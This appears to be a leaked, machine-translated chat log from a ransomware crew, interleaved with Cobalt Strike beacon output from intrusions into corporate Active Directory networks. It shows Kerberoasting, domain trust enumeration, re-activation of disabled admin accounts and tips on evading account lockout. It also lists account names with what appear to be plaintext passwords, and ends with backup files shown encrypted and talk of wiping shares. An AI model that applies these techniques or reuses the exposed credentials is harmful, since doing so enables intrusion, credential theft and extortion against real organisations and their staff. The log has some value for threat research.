ad-apse2.np.aws.saig - not pinging
saig.frd.global - 10.212.8.247
ad-euce1.prd.aws.saig - not pinging
usea1.np.aws.saig - dns not available, but it is not quarantined in ad_comp
```.```
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:34:03> shell net user CATOR-SQLSA /dom
[*] Tasked beacon to run: net user CATOR-SQLSA /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain saig.frd.global.

User name CATOR-SQLSA
Full Name CATOR-SQLSA
Comment Assurance BAT Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 23/11/2008 3:05:24 AM
Password expires Never
Password changeable 24/11/2008 3:05:24 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/10/2020 1:15:02 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *SG-Global-Azure-SAIGL*Domain Users
The command completed successfully.

``Check all the accounts under which you did the tokens.The point is that if you do under the token, the account in the lock will fly))))) ``The user name or password is incorrect.`` What are you talking about? So what, he has the same credentials does not matcha so everyone supported his answer because the rest did not respond to anything means @user7 said on behalf of the team)ya molchal)))[ ](https://mediaeveryonecom/group/saiglobal-com?msg=35JCRwHAQDSmz9Egw) 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=GDd8wXHsW6roifBW4) 1schat all lock...-so you removed them because miktoken? how the pig will understand that we will address different?
datacenter.local
``````
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
``````
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | how to understand``
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
```
```
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``And you take the kerb on the trastk it is not in the quarantine how can you remove the kerb there at all?)If it is a quarantined domain.Maybe from the quarantine
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local |` fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
``as already taken down in theirsnimi kerbs in this domain from system execute[ ](https://mediaeveryone.com/group/saiglobal-com?msg=hzcJhm5tky72ecxNW) from YES?
or to what? ``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl'' try to execute it from your@user9 have you had these errors?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Wif3ijHzbeWo7syeq) from current don``t
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:


Didn't you take it out after make_token?
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:18:22> psinject 2132 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl into 2132 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/asnet2000.standards.com.au:1433' from user 'CN=geronimo,OU=Users Pre-MOE,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05677XPD.standards.com.au:1433' from user 'CN=Sam Allen,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05591XPN.standards.com.au:1433' from user 'CN=Raymond Yuen,OU=Users-Disabled,OU=Users,OU=SAI-Global - objects NOT to be migrated,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05556WD.standards.com.au:1433' from user 'CN=Aaron Flew,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/SYDIIS.standards.com.au:1700' from user 'CN=SSQLrvService,OU=Service Accounts,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."

```
What's wrong? Check the file?
[*] Tasked beacon to psinject: invoke-kerberoast -domain datacenter.local -outputformat hashcat | fl | out-file -filepath c:\ProgramData\datacenterlocalhash.txt -append -force -encoding UTF8 into 840 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/C360SQL3:56162' from user 'CN=usatlhc-sql,CN=Users,DC=datacenter,DC=local' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."

``a, not in hashtag format)))))))
i'm going to redo it now try to remove the kerb trustabes token usernet have you taken the kerbs off and done nothing yet? if he had been blocked in front of him, most likely in 3 hours you would have lost all sessions already````
Lockout threshold: 10

``He's not the last administrator, by the way.
Local Group Memberships *Backup Operators *Epicor Admins
Global Group memberships *Exchange Admins *SAIG Corporate IT Dat
                             *SG-Global-FTP-Adminis*APAC Websense Web Sec
                             *SG-EMEA-Citrix-Admin *APAC SAN Admin
                             *SL-SAIG-EU CS vCenter*SG-AS-Citrix-AdminApp
                             *SG-Americas-Storage-A*ucsadmin
                             *APAC Citrix Admin Acc*SG-Global-TEN-Admin
                             *SG-Okta-MFA Yubikey *SAIG Corporate IT SCC
                             *SG-Global-Actifio-Adm*SG-Global-Azure-SAIGL
                             *SG-APAC-Citrix-Admin *SG-Okta-Salesforce-Co
                             *APAC MOM Authors *APAC Storage Admins
                             *APAC Actifio Admins *SG-APAC-Horizon-RDP
                             *SG-Okta-MFA SMS *SG-Okta-Admin Super A
                             *SG-Global-FPS-Adminis* SG-Okta-Salesforce-SL
                             *SAIG Corporate IT Tre*SAIG Corporate IT SCC
                             *Desktop Admins *Group Policy Creator
                             *SAIG SMS Administrato*VCO_Admins
                             *SG-Okta-Fortinet *SG-GLOBAL-EMS-ADMIN
                             *SG-AMER-SAN-PureAdmin*SG-Okta-MFA Okta Veri
                             *Domain Admins *APAC vCenter Admin
                             *SAIG SMS Users *SG-GLOBAL-vCenter Adm.
                             *Domain Users *SG-Okta-SandboxAccess
                             *SG-GLOBAL-Horizon-Adm*SG-AMER-HorizonPOC1-U
                             *APAC SAN Users *SG-Americas-Citrix-Ad
                             *Exchange Full Admins *SAIG SMS RemoteResolv
                             *sg-aws-adfs-opsprod-c*SG-APAC-Citrix-RDP
                             *Americas Actifio Admi*SG-Citrix-TerminalSVC
                             *SG-Global-OKTA-Users *Firewall Admins
                             *SG-Corp-IT-Americas *SG-Okta-Jamf Pro
                             *SQL Admins *SPS Administrators
                             *SG-AMER-VCENTER-Admin *SG-IT-Americas
``How many attempts do you need to see the password block policy?
beacon> shell net user adm.kinzac0 /domain /active:yes
[*] Tasked beacon to run: net user adm.kinzac0 /domain /active:yes
[+] host called home, sent: 71 bytes
[+] received output:
The command completed successfully.


beacon> shell net user adm.kinzac0 /dom
[*] Tasked beacon to run: net user adm.kinzac0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name adm.kinzac0
Full Name Admin - Zach King
Comment Zach King Administrator Account
User's comment
Country/region code (null)
Account active Yes
Account expires Never

``Hasn't his password been changed? If it was taken in the 20s
```
adm.fraste1
Password last set 23/09/2020 12:59:10 PM
Password expires 7/12/2020 12:59:10 PM
Password changeable 24/09/2020 12:59:10 PM

``CATOR-SQLSA
Americadpm
sqladmin check yes for validitydid you do? not just usually sampling of 3You have more passwords are you on dcsync? if we do not have a new password dcsync? yes user loginname /DOMAIN /active:YES ?when it hits the joint 1 day before expires and postlet to info may not be relevant literally the next day[ ](https://mediaeveryone.com/group/saiglobal-com?msg=uj7Y469YPjWWeRJXu) of course it's better to check accessesyou have such a possibility and preferably quicklyerasblock his token with invalid password and blocked him)info was taken in 20 dayshe had his password changed on the 27th
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM

``So maybe the rest of the YES should also be checked? and who was blocked? what were the last 5 teams? no, so we didn't even have time to do anything(lying?:face_with_monocle:that was it((already blocked?
```
The referenced account is currently locked out and may not be logged on to.

``````
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:44:38> shell ping c360.local -n 1
[*] Tasked beacon to run: ping c360.local -n 1
[+] host called home, sent: 51 bytes
[+] received output:

Pinging c360.local [10.195.43.2] with 32 bytes of data:
Reply from 10.195.43.2: bytes=32 time<1ms TTL=127

Ping statistics for 10.195.43.2:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:43:18> shell ping SaigProd.local -n 1
[*] Tasked beacon to run: ping SaigProd.local -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging SaigProd.local [10.195.100.1] with 32 bytes of data:
Reply from 10.195.100.1: bytes=32 time<1ms TTL=127

Ping statistics for 10.195.100.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=rtmTXhZPPjifbRMpn) please send me the current server dns and quarantines quarantined so portscan to 445 port at this address, all trusts were pinged, even 2 quarantined ones or replica on ping is disabled[ ](https://mediaeveryone.com/group/saiglobal-com?msg=WH9sEZfcrAfXdBwMQ) when you get this result, most probably from your entry point where you are in session now, traffic is not allowed. Most probably WSUS server needs to look for servers with quarantined domain in DNS so no ping, I think it is understandable here `` ``.
Ping request could not find host Anstat.local. Please check the name and try again.
```
it is like he does not see it because the domain is quarantined and DNS within this domain is not available to our domain@user3 and all others[ ](https://mediaeveryone.com/group/saiglobal-com?msg=oYJ3E9eGQJ3TH2hgL) dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/02-22:18:37 Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]``.
beacon> run ping ad-apse2.prd.aws.saig
[*] Tasked beacon to run: ping ad-apse2.prd.aws.saig
[+] host called home, sent: 44 bytes
[+] received output:

Pinging ad-apse2.prd.aws.saig [10.10.149.148] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.
Request timed out.

Ping statistics for 10.10.149.148:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

``3/4 100% loss''.

Pinging ad-apse2.np.aws.saig [10.10.4.166] with 32 bytes of data:
Request timed out.

Ping statistics for 10.10.4.166:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``````
beacon> run ping Anstat.local
[*] Tasked beacon to run: ping Anstat.local
[+] host called home, sent: 35 bytes
[+] received output:
Ping request could not find host Anstat.local. Please check the name and try again.

If it's not pinging, do you go further down the list? And another thing, since the report will be an archive, next to the ad_*.txt file, make a creds.txt file.
DCs
DA
EA
LA and if you run the command 5 times net use in another domain without reading the error as you like, then you can say that about 50% of the admins that something will suspect) and more, crud YES in other domains can block your account as you understand the beginning ping all domains and see if they respond quarantined more difficult because you can not get out of there any information, you can check the availability of DNS from a quarantined domain but in this case, dsync THROUGH trust will be very noisyIn such a relationship, you can use trust to pull kerbs, pull AD, I think @user8 dcsync by trust just saw @user7 take two quarantined domains)))) it's harder with quarantined domains
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``````
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
````trustDirection ``trustAttributes`` Did you read what to look for?
trusts can't have all pdk's, right?
```
trusts:
datacenter.local
ad-apse2.build.aws.saig
ad-usea1.prd.aws.saig
c360uk.local
```
```
EA:
saig.frd.global\CATOR-SQLSA T3rm1nal
``anyone read the trusts file?
dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
```
my
`saig.frd.global\tresvc0 3nterprisE````
saig.frd.global\adm.kinzac0 dr3Amth3At3r
```

```
dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global
dn:CN=saig.frd.global,CN=System,DC=frd,DC=global
dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global
dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global

``````
saig.frd.global\tresvc0 3nterprisE
>name: datacenter.local
>name: legalco.local
>name: anstat.local
>name: ad-apse2.prd.aws.saig
``So if we find these, they are written in a separate groupwhy I wrote about the allocation of backup servers, you should relate to the scan, it often happens that the backup server is outside the domain, they are somewhere in the workgroup nearby and as you have understood, the report will be the archive in which
1) YES, hell info, EA, LA on MAC, hashes of all users
2) Sort all PCs in the domain
3) Which EDR and where it is administered (admin with valid accesses)
4) In each trust session (or specifying the links from where to where and how to get in)
6) Separate group of backup servers, separate user's PCs
Repeat items above for each domain to 3 hours can handle it (260 machines per brotam will be reported to me if we do it manually) 1300 servers in one domain this time I think immediately by hand, on Saturday almost an hour with the script struggled, in the end pinged for 5 minutes, what did loomisco disassemble the network What is the task? again pinged decided yes? hopefully this time faster) ad_comp > win serv > ping > portscan /24
?```

      IDJAK-COPFP01.saig.frd.global [DS] Site: IDKBU1
     UKMK1-COPADS01.saig.frd.global [DS] Site: UKMIK1
    USALP1-COPADS01.saig.frd.global [DS] Site: USALP1
    USWAL1-COPADS01.saig.frd.global [DS] Site: USWAT1
        CNPEKJV-DC1.saig.frd.global [DS] Site: CNCHD1
    AUMEL1-COPADS02.saig.frd.global [DS] Site: AUMEL1
    THPAT1-COPADS02.saig.frd.global [DS] Site: THPAT1
    AUBNE1-COPADS01.saig.frd.global [DS] Site: AUBNE1
    AUOSB1-COPADS01.saig.frd.global [DS] Site: AUOSB1
    AUPME1-COPADS02.saig.frd.global [DS] Site: AUPME1
    JPTOK1-COPADS01.saig.frd.global [DS] Site: JPTOK1
    UKHDC1-COPADS01.saig.frd.global [DS] Site: UKHDC1
    UKHDC1-COPADS02.saig.frd.global [DS] Site: UKHDC1
    CATOR1-COPADS01.saig.frd.global [DS] Site: CATOR1
    auhdc1-copads01.saig.frd.global [PDC] [DS] Site: AUHDC1
    AUSYD1-COPADS01.saig.frd.global [DS] Site: AUSYD1
    USHDC1-COPADS03.saig.frd.global [DS] Site: USHDC1
    USHDC1-COPADS02.saig.frd.global [DS] Site: USHDC1
    AUHDC2-COPADS02.saig.frd.global [DS] Site: AUHDC2
    AUHDC2-COPADS01.saig.frd.global [DS] Site: AUHDC2
    AUHDC1-COPADS03.saig.frd.global [DS] Site: AUHDC1
    AUSYD1-COPADS02.saig.frd.global [DS] Site: AUSYD1
    AUHDC1-COPADS02.saig.frd.global [DS] Site: AUHDC1
    AUHDC1-COPADS04.saig.frd.global [DS] Site: AUHDC1
    NLDEN1-COPADS01.saig.frd.global [DS] Site: NLDEN1
    AUHDC1-COPADS05.saig.frd.global [DS] Site: AUHDC1
    AUADE1-COPADS03.saig.frd.global [DS] Site: AUADE1
    KRSEO1-COPADS01.saig.frd.global [DS] Site: KRSEO1
     IDJAK-COPADS01.saig.frd.global [DS] Site: IDKBU1
    auspt1-copads02.saig.frd.global [DS] Site: AUSPT1
     EUCEN1COPADS01.saig.frd.global [DS] Site: EUCEN1
     EUCEN1COPADS02.saig.frd.global [DS] Site: EUCEN1
     EUCEN1COPADS03.saig.frd.global [DS] Site: EUCEN1
      usnachc-rbs01.saig.frd.global [RODC]
    ittur1-cop-rbs1.saig.frd.global [RODC]
    esmad1-cop-rbs1.saig.frd.global [RODC]
       aubne1-rbs01.saig.frd.global [RODC]
       auhdc2-rbs01.saig.frd.global [RODC]
       thpat1-rbs01.saig.frd.global [RODC]
       idjak1-rbs01.saig.frd.global [RODC]
       cnzhd1-rbs01.saig.frd.global [RODC]
       jptok1-rbs01.saig.frd.global [RODC]
       krseo1-rbs01.saig.frd.global [RODC]
       cnchd1-rbs01.saig.frd.global [RODC]
       auspt1-rbs01.saig.frd.global [RODC]
       aumel1-rbs01.saig.frd.global [RODC]
       ausyd1-rbs01.saig.frd.global [RODC]
       aucbr1-rbs01.saig.frd.global [RODC]
        auhob1-rbs1.saig.frd.global [RODC]
       auhob1-rbs01.saig.frd.global [RODC]
       auhdc1-rbs01.saig.frd.global [RODC]
       auper1-rbs01.saig.frd.global [RODC]
       auade1-rbs01.saig.frd.global [RODC]
       auwme1-rbs01.saig.frd.global [RODC]

================================================

adm.barsmr0 adm.bisfra0 adm.bremic0
adm.brodan0 adm.brodav1 adm.caupau0
adm.damben0 adm.davjon0 adm.evamar1
adm.fraste1 adm.hauant0 adm.kalnic0
adm.kemrob0 adm.kinzac0 adm.kinzac1
adm.lowrhy0 adm.macpet0 adm.matdmy0
adm.phykev0 adm.rutluq0 adm.soucam1
adm.staric0 adm.taydav1 adm.tedmar0
adm.turime0 adm.wu0dav0 adm.yorgar0
Admin.AVservers admin.DTservice admin.LMS
Admin.MOMaction admin.websense1 Admin.White
admnav0 Americadpm AUSYDHC-WINCL02$
backup-exec balpro0 cadmin0
dpservice eis_netapp EMEA.SCCM.Admin
EMEA.SCCM.Client fsae.service inssvc0
offser0 ops.ji0lei0 ops.kasbri0
ptbackup RBservice rdpservices
serqmi0 sqladmin svc.amwebsense
svc.cloudlink svc.dpmadmin svc.foldersync
svc.lansweeper svc.msmap svc.ncentral
svc.netrix svc.OMAdmin svc.sccmcliinst
svc.sharegate svc.sharegate2 svc.sharegate3
svc.sharegate4 svc.sharegate5 svc.sharepoint
svc.vcauth svc_actifio svc_scanner_chicago
SVC_Tenablescan svc_trendmicro svc-amer-ems-search
svc-apac-ems-search SVC-CloudEndure svc-emea-ems-search
SVC-Global-AD-LDAP SVC-Global-Azure-ADC svc-global-okta-ad
SVC-SCCMadmin sv-emea-adm-actifio tasks
tresvc0 ukmik-dbsa UKvc4admin
vcatladmin0 verisign verisignus
walbexec WebAppAdminProd
saig.frd.global\adm.fraste1 Access04
saig.frd.global\sqladmin u5t3r
saig.frd.global\Americadpm B0b@f3tt
saig.frd.global\CATOR-SQLSA T3rm1nal
saig.frd.global\tresvc0 3nterprisE
saig.frd.global\adm.kinzac0 dr3Amth3At3r

``saiglobal.com Just do not dump again have a good weekend thank you all caught up I have what is on Mon by 2 I need a session then and that's it1.done.rtpcompany.com> the wheel to spin a little
> I don't understand how you didn't understand that I need a session out of the water if I write you about it in that confu I never understood what session@user8 I never waited for a session from you
server:
US.ALLOYPOLYMERS.COM
hell: 47
alive: 10
closed 10

WINONA.RTPCO.LOCAL
by hell: 52
alive:45
closed 45

RTPCO.LOCAL
by hell: 106
alive: 90
closed:90


ARMS:
 
RTPCO.LOCAL
By hell: 1,076
Alive: 217
 
WINONA.RTPCO.LOCAL
By hell: 65
Alive: 12
 
US.ALLOYPOLYMERS.COM
By hell: 501
Alive: 24


domain vide unshared disks and killed important processes
ices have been wiped out
``Turn the wheel a little if yes, I'm waiting for the statistics and winding down the servers, the center and everything else?
[+] host called home, sent: 38 bytes
beacon> ls E:\Backups\Henderson
[*] Tasked beacon to list files in E:\Backups\Henderson
[+] host called home, sent: 38 bytes
[*] Listing: E:\Backups\Henderson\

 Size Type Last Modified Name
 ---- ---- ------------- ----
 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN
 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN
 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN
 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN
 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN
 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN
 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN
 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN
 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN
 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN
 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN
 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN
 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN
 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN
 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN
 64gb fil 01/15/2021 23:38:37 HendersonD2020-12-31T180035_06A1.vib.RQGNN
 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN
 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN
 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN
 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN
 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN
 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN
 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN
 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN
 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN
 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN
 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN
 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN
 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN
 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN
 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN
 930b fil 01/15/2021 22:14:24 readme.txt
``All the process1 file?
beacon> ls E:\Backups\Henderson
[*] Tasked beacon to list files in E:\Backups\Henderson
[+] host called home, sent: 38 bytes
[*] Listing: E:\Backups\Henderson\

 Size Type Last Modified Name
 ---- ---- ------------- ----
 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN
 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN
 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN
 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN
 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN
 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN
 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN
 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN
 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN
 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN
 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN
 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN
 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN
 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN
 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN
 64gb fil 01/15/2021 23:01:49 HendersonD2020-12-31T180035_06A1.vib
 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN
